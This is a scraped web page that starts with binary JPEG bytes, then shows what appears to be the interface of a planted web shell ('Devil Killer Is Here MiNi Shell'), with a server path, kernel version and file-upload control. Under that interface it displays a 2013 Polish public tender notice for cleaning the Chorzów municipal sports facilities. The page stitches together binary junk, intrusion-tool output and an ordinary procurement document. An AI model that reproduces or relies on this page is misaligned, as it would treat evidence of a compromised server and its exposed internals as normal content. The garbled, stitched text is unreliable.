JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131114/464078-N-2013.html

<p class="kh_header"><b>Chorzów: Usługi sprzątające dla obiektów Miejskiego Ośrodka Rekreacji i Sportu w Chorzowie</b><br>
<b>Numer ogłoszenia: 464078 - 2013; data zamieszczenia: 14.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Rekreacji i Sportu , ul. Dąbrowskiego 113, 41-500 Chorzów, woj. śląskie, tel. 032 2417050, 2411313, faks 032 2417055.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi sprzątające dla obiektów Miejskiego Ośrodka Rekreacji i Sportu w Chorzowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Utrzymanie czystości na obiekcie sportowym przy ul. Dąbrowskiego 113 w Chorzowie obejmować będzie całość powierzchni  budynku hali z wyłączeniem pomieszczeń biurowych:
1.1 Sprzątanie w szczególności obejmuje:
a) powierzchnia widowni i korony hali sportowej oraz krzesełka na widowni 
b) mała sala gimnastyczna, 
c) siłownia, salka aerobiku, sauna
d) magazyn
e) portiernia 
f) szatnie z sanitariatami i natryskami, 
g) schody, 
h) korytarze 
i) sanitariaty
1.2
Wyliczenie powierzchni do utrzymania czystości: 
Płytki ceramiczne :  ok. 3400 m2
Wykładzina PCV ok. 600 m2 
Powierzchnia okien hali ok. 70 m2 
Powierzchnia innych okien i przeszkleń ok. 500 m2 
Urządzenia w siłowni ok. 40 szt. 
a) Sprzątanie należy wykonywać 6(sześć) razy w tygodniu od poniedziałku do soboty, w godzinach   od 23:00 do 7:00, w szczególności: 
- maszynowe lub ręczne mycie posadzek we wszystkich wymienionych wyżej pomieszczeniach
- czyszczenie mato - wycieraczek
- opróżnianie koszy na śmieci, wymiana worków, mycie koszy, złożenie śmieci w pojemnikach 
  do tego przeznaczonych 
- wycieranie kurzu na mokro z parapetów
- utrzymanie w czystości luster, przeszkleń i szyb drzwiowych, 
- utrzymanie w czystości umywalek, zlewozmywaków i kranów
- mycie i dezynfekcja muszli klozetowych, pisuarów, szczotek toaletowych, 
- utrzymanie w czystości pojemników na mydło i ręczniki 
- uzupełnianie i wymiana środków higienicznych zapewnianych przez Zamawiającego ( niezwłocznie po wyczerpaniu) 
b) SPRZĄTANIE 1 ( jeden) RAZ W TYGODNIU w godzinach j.w, w szczególności:
- utrzymanie w czystości glazury na ścianach 
-  utrzymanie w czystości drzwi, klamek, włączników , kontaktów, grzejników 
- usuwanie pajęczyn
- wycieranie i mycie balustrad i poręczy
c) SPRZĄTANIE 1 (jeden) RAZ NA KWARTAŁ w szczególności:
- mycie okien otwieranych dwustronnie ( termin uzgodnić z Zamawiającym)
d) SPRZĄTANIE 1 (jeden) RAZ  W ROKU w szczególności:
- mycie okien hali oraz salki gimnastycznej - raz do roku ( termin uzgodnić z Zamawiającym)
2. Utrzymanie czystości na obiekcie sportowym Hajduki przy ul. Granicznej 92 w Chorzowie obejmować będzie całość powierzchni budynku hali z wyłączeniem pomieszczeń biurowych i basenu:
2.1. Sprzątanie w szczególności obejmuje:
- powierzchnia widowni i korony hali sportowej oraz krzesełka na widowni
- salka aerobiku, 
- szatnie z sanitariatami i natryskami, 
- sanitariaty
- schody, 
- korytarze 
- salka konferencyjna 
2.2 Wyliczenie powierzchni do utrzymania czystości:
Płytki ceramiczne ok. 880 m2 
Wykładzina PCV ok. 80 m2 
Powierzchnia okien i przeszkleń ok. 700 m2 
a) Sprzątanie należy wykonywać 6 ( sześć) razy w tygodniu od poniedziałku do soboty- sprzątanie na zmiany: I zmiana w godzinach od 14:00 - 20:00 ( min. 1 osoba)
II zmiana w godzinach od 23:00 - 5:00 ( min. 1 osoba)
 w szczególności: 
- maszynowe lub ręczne mycie posadzek w wszystkich wymienionych wyżej pomieszczeniach
- czyszczenie mato - wycieraczek
- opróżnianie koszy na śmieci, wymiana worków mycie koszy, złożenie śmieci w pojemnikach do tego przeznaczonych 
- wycieranie na mokro kurzu z parapetów
- utrzymanie w czystości luster, przeszkleń i szyb drzwiowych
- utrzymanie w czystości umywalek, zlewozmywaków i kranów
- mycie i dezynfekcja muszli klozetowych, pisuarów, szczotek toaletowych, 
- utrzymanie w czystości pojemników na mydło i ręczniki 
- uzupełnianie i wymiana środków higienicznych zapewnianych przez Zamawiającego ( niezwłocznie po wyczerpaniu)
b) SPRZĄTANIE 1 ( jeden) RAZ W TYGODNIU w szczególności:
- utrzymanie w czystości glazury na ścianach 
-  utrzymanie w czystości drzwi, klamek, włączników , kontaktów, grzejników 
- usuwanie pajęczyn
- wycieranie i mycie balustrad i poręczy
c) SPRZĄTANIE 1 (jeden) RAZ NA KWARTAŁ w szczególności:
- mycie okien ( terminy uzgodnić z Zamawiającym)
3. Inne uwarunkowania	
a) Zamawiający wymaga od Wykonawcy odpowiednich ilości osób sprzątających. Podyktowane jest to wielkością obiektów oraz doświadczeniem Zamawiającego przy nadzorowaniu prac, a mianowicie:
- obiekt przy ul. Dąbrowskiego 113 - minimum 4 osoby ( ZMIANA NOCNA)
- obiekt przy ul. Granicznej 92 - minimum 2 osoby ( 2 ZMIANY: POPOŁUDNIOWA NOCNA, na każdej zmianie po min. 1 osobie)
b) Zamawiający zaleca przeprowadzenie wizji lokalnej.
c) UWAGA: Wykonawca zobowiązany jest uwzględnić prace na wysokości - mycie okien hali oraz salki gimnastycznej 
d) W przypadku wystąpienia awarii skutkującej koniecznością sprzątania innych niż wymienione powyżej pomieszczeń w innym niż wymieniony, zakresie, Zamawiający uzgodni z Wykonawcą szczegóły usługi i udostępni pomieszczenia.
e) Zamawiający wymaga, aby wykonawca dysponował odpowiednim sprzętem, zapewniającym prawidłowe utrzymywanie czystości na obiektach (tj. dwu komorowe wiadra, czyste mopy, czyste ścierki itp.) 
f) Zamawiający zapewnia środki potrzebne do utrzymania czystości. Zamawiający zapewnia bezpłatny dostęp do mediów oraz pomieszczeń gospodarczych. 
g) Wykonawca będzie zobowiązany do wzięcia odpowiedzialności za sprzęt i wyposażenie znajdujące się w sprzątanych pomieszczeniach, za stan powierzonych mu pomieszczeń oraz za szkody powstałe z jego winy w trakcie wykonywania zamówienia.
h) Wykonawca będzie zobowiązany do wykonywania usług z należytą starannością, przy zachowaniu obowiązujących przepisów BHP i p.poż. i ponosić będzie pełną odpowiedzialność za uchybienia stwierdzone podczas kontroli związanych z wykonywanymi usługami.
i) Pracownicy Wykonawcy muszą posiadać jednolitą odzież z widoczną nazwą firmy oraz identyfikatory imienne. 
III.3 Na podstawie ww. opisu przedmiotu zamówienia, należy wycenić wszystkie usługi objęte niniejszym zamówieniem  z podziałem na 2(dwa ) obiekty tj. ul. Dąbrowskiego 113 i ul. Graniczna 92 oraz wpisać kwoty netto, VAT oraz brutto w formularz ofertowy zał. nr 1 do SIWZ. ( kwoty dotyczyć mają okresu 12 miesięcznego oraz 1-no miesięcznego).
ROZDZIAŁ IV. Termin wykonywania zamówienia
Przedmiot zamówienia należy wykonywać w terminie od  01.01.2014r. do 31.12.2014r..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W okresie 3 ostatnich lat od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy usługi, zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegającego na rozszerzeniu usługi</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca winien wnieść wadium  w wysokości 2.000,- zł (dwa tysiące złotych). przed upływem terminu składania ofert tj. w nieprzekraczalnym terminie do dnia 21.11.2013r do godz..9:00
2. Wadium może być wnoszone w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy  jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz.  
730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).

Jeżeli wadium jest wnoszone w pieniądzu, należy je wpłacić przelewem na  wskazany  rachunek bankowy Zamawiającego: 45 1050 1243 1000 0022 4984 4891

Wniesienie wadium w pieniądzu będzie skuteczne, gdy wpływ środków na rachunek zamawiającego nastąpi przed upływem terminu składania ofert. 

Jeżeli wadium jest wnoszone w formie innej niż pieniądz, oryginały dokumentów, o których mowa wyżej należy złożyć w kasie, natomiast do oferty należy załączyć ich kserokopię. 
Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.
3. Zamawiający dokonuje zwrotu wadium oraz żąda ponownego wniesienia wadium zgodnie z warunkami określonymi  w art. 46 ust. 1, 1a, 2 i 3 ustawy - Prawo zamówień publicznych. 
4.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń potwierdzających spełnienie  warunków udziału w postępowaniu, o których mowa w art. 25 ust. 1, lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
	1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 	w ofercie
	2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy
	3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn 	leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:
a)  posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania 
b)   posiadania wiedzy i doświadczenia 
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do   wykonania 
    zamówienia 
d)  sytuacji ekonomicznej i finansowej 
e)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy przedstawią wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz  z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonywane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. 
Za zadanie odpowiadające rodzajem i wartością zamówienia Zamawiający uzna wykonanie następujących usług: sprzątających za kwotę nie mniejszą niż 70.000,00 zł. brutto każda (2 szt.), (załącznik nr 6 do siwz )
Dowodami, o których mowa wyżej jest poświadczenie. Zamiast poświadczenia przez okres 12 miesięcy od dnia wejścia w życie rozporządzenia w sprawie rodzajów dokumentów, tj. od dnia 20.02.2013, Wykonawca może przedkładać dokumenty potwierdzające należyte wykonanie usług  zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie.

Zgodnie z art. 26 ust. 2b ustawy Pzp, Wykonawca może polegać na wiedzy i doświadczeniu niezbędnym do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 

Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy (wiedza i doświadczenie innych podmiotów), a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający  żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w rozdz. VI, pkt. A ust.1 pkt.1,2,3,5</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeżeli Wykonawca przedłoży:
- imienną listę co najmniej 6 osób, zawierającą  imię i nazwisko, nr dowodu osobistego, doświadczenie i podstawę do dysponowania osobami, które będą oddelegowane do wykonania usług objętych niniejszą umową

  Wykonawca zobowiązuje się powierzyć świadczenie usług objętych zamówieniem pracownikom nie karanym za przestępstwa przeciwko mieniu i przeciwko wiarygodności dokumentów. Na pierwsze żądanie zamawiającego wykonawca zobowiązany będzie przedłożyć Zamawiającemu zaświadczenia z Krajowego Rejestru Karnego osób skierowanych do pracy w wykonaniu niniejszego zamówienia.(KRK nie dołączać do oferty)

Zgodnie z art. 26 ust. 2b ustawy Pzp, Wykonawca może polegać na potencjale technicznym oraz osobach zdolnych do   wykonania zamówienia niezbędnymi do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 

Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy (potencjale technicznym oraz osobach zdolnych do   wykonania zamówienia innych podmiotów), a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający  żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w rozdz. VI, pkt. A ust.1 pkt.1,2,3,5</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że:
posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności                   ( odpowiedzialność kontraktowa i deliktowa) związanej z przedmiotem zamówienia w wysokości nie mniejszej niż  60. 000,- zł.

Zgodnie z art. 26 ust. 2b ustawy Pzp, Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy (zdolności finansowej innych podmiotów), a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający  żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w rozdz.VI, pkt. A ust.1 pkt. 1,2,3,5</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku składania oferty przez Wykonawców ubiegających się wspólnie, dokumenty wymienione w pkt. A ust. 1 muszą być złożone przez każdego uczestnika konsorcjum oddzielnie, zaś dokumenty wymienione w pkt. B, C, D, E  Wykonawcy mogą złożyć łącznie. 

Przesłanki skutkujące wykluczeniem wykonawcy z postępowania, określone w art. 24 ust. 1 ustawy Pzp odnoszą się do każdego z członków konsorcjum oddzielnie. Oznacza to, że oświadczenie o niepodleganiu wykluczeniu z postępowania musi zostać złożone oddzielnie przez każdego z konsorcjantów lub przez pełnomocnika konsorcjum w imieniu każdego z konsorcjantów. 

Ponadto, Wykonawcy wspólnie ubiegający się o zamówienie winni ustanowić Pełnomocnika. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Jeżeli oferta Wykonawców  ubiegających się wspólnie o udzielenie zamówienia zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia umowy regulującej współpracę tych Wykonawców.

